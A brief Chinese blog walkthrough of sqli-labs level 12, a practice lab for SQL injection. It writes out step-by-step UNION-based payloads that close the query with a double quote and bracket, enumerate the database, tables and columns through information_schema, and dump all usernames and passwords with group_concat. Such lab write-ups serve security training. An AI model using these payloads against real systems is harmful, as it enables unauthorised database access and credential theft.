0X01摘要体现(小编这里傻逼了 可以直接用group_concat函数绕过显示问题我还在用limit绕过)

还是这个模块  我们很熟徐那么先来尝试一下

单引号加入

sqli-labs(12)_sql

无报错信息 哦豁 加入双引号试试呐

sqli-labs(12)_sql_02

哦豁 好像报错 了 还多了一个括号 那我们尝试一下闭合语句

") order by 1 #

好像成功闭合了 哈哈 看来没有猜错 元语句应该是 id=("")

sqli-labs(12)_sql_03

那都知道了语句的闭合原理 那我们 开始我们的注入旅途吧 OK let’s go

0X02爱之初体验 爆数据库

") union select null,database()#

sqli-labs(12)_sql_04

 

 0X03就是一套组合拳了 爆破表名

") union select null,table_name from information_schema.tables where table_schema='security'#

sqli-labs(12)_sql_05

老规矩  他只显示了一个数据 我们可以用limit函数来一个一个拆解出来 嘿嘿

") union select null,table_name from information_schema.tables where table_schema='security'limit 1,1#

sqli-labs(12)_sql_06

0X04继续我们的组合拳 爆破列名

")union select  null,column_name from information_schema.columns where table_name='users' limit 0,1#

sqli-labs(12)_sql_07

0X05组合拳打到底  爆破字段名

") union select null,group_concat(username,0x3a,password) from users#

 

sqli-labs(12)_sql_08

舒舒服服

完结

切记 慢就是快